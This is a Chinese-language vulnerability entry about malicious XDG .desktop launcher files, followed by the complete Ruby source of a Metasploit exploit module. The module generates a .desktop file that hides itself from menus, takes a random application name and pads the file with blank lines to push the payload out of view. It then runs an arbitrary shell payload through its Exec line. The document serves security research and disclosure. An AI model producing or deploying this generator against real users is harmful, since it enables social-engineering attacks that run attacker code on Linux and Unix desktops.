Malicious XDG Desktop File

漏洞信息

漏洞名称： Malicious XDG Desktop File

漏洞类型： 文件上传

漏洞等级： 高危

漏洞描述： 该漏洞涉及XDG桌面文件（.desktop文件）的恶意利用。XDG桌面文件是一种在Linux、Unix、Solaris和FreeBSD等操作系统中用于定义应用程序启动器的标准文件格式。这些文件通常用于图形用户界面中，以便用户可以方便地启动应用程序。然而，由于这些文件可以包含执行命令的指令，恶意构造的.desktop文件可能被用来执行未经授权的命令。

漏洞的技术根源在于.desktop文件的执行指令（Exec字段）可以被恶意构造，以执行任意命令。尽管大多数现代系统默认不信任.desktop文件，并在运行时会向用户显示警告提示，但用户可能仍然选择运行这些文件。此外，某些桌面环境的默认文件管理器应用程序可能会施加更严格的执行要求，例如提示用户将文件设置为可执行文件或标记为受信任文件，然后才能执行。

这种漏洞的安全风险较高，因为它可能导致远程代码执行。攻击者可以通过诱骗用户打开恶意构造的.desktop文件来利用此漏洞。由于这种攻击需要用户的交互，因此它通常被视为一种社会工程攻击。然而，一旦用户被诱骗执行恶意文件，攻击者就可以在受害者的系统上执行任意命令，可能导致数据泄露、服务中断或其他恶意活动。这种漏洞不需要认证即可利用，但需要用户的某种形式的交互。

产品名称： XDG Desktop

来源： https://github.com/rapid7/metasploit-framework/blob/28799d90abe13afcf4e5cdeb466c545bb0ceb9c5/modules%2Fexploits%2Fmulti%2Ffileformat%2Fxdg_desktop.rb

类型： rapid7/metasploit-framework:github issues

POC详情

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Malicious XDG Desktop File',
        'Description' => %q{
          This module creates a malicious XDG Desktop (.desktop) file.

          On most modern systems, desktop files are not trusted by default.
          The user will receive a warning prompt that the file is not trusted
          when running the file, but may choose to run the file anyway.

          The default file manager applications in some desktop environments
          may impose more strict execution requirements by prompting the user
          to set the file as executable and/or marking the file as trusted
          before the file can be executed.
        },
        'Author' => [
          'bcoles'
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['ATT&CK', Mitre::Attack::Technique::T1204_002_MALICIOUS_FILE],
          ['URL', 'https://specifications.freedesktop.org/desktop-entry-spec/latest/'],
          ['URL', 'https://specifications.freedesktop.org/desktop-entry-spec/latest/exec-variables.html'],
          ['URL', 'https://wiki.archlinux.org/title/Desktop_entries']
        ],
        'Platform' => %w[linux unix solaris freebsd],
        'Arch' => [ARCH_CMD],
        'Targets' => [
          [ 'Automatic', {} ]
        ],
        'DefaultTarget' => 0,
        'Privileged' => false,
        'DisclosureDate' => '2007-02-06',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [SCREEN_EFFECTS]
        }
      )
    )

    register_options([
      OptString.new('FILENAME', [false, 'The desktop file name.', 'msf.desktop']),
      OptString.new('APPLICATION_NAME', [false, 'The application name. Some file managers will display this name instead of the file name. (default is random)', '']),
    ])

    register_advanced_options([
      OptInt.new('PrependNewLines', [false, 'Prepend new lines before the payload.', 100]),
    ])
  end

  def application_name
    datastore['APPLICATION_NAME'].blank? ? rand_text_alpha(6..12) : datastore['APPLICATION_NAME']
  end

  def exploit
    values = [
      'Type=Application',
      "Name=#{application_name}",
      # 'Hidden=true', # This property is not supported by old systems, which prevents execution
      'NoDisplay=true',
      'Terminal=false'
    ]
    desktop = "[Desktop Entry]\n"
    desktop << values.shuffle.join("\n")
    desktop << "\n"
    desktop << "\n" * datastore['PrependNewLines']

    escaped_payload = payload.encoded.gsub('\\', '\\\\\\').gsub('"', '\\"')
    desktop << "Exec=/bin/sh -c \"#{escaped_payload}\""

    file_create(desktop)
  end
end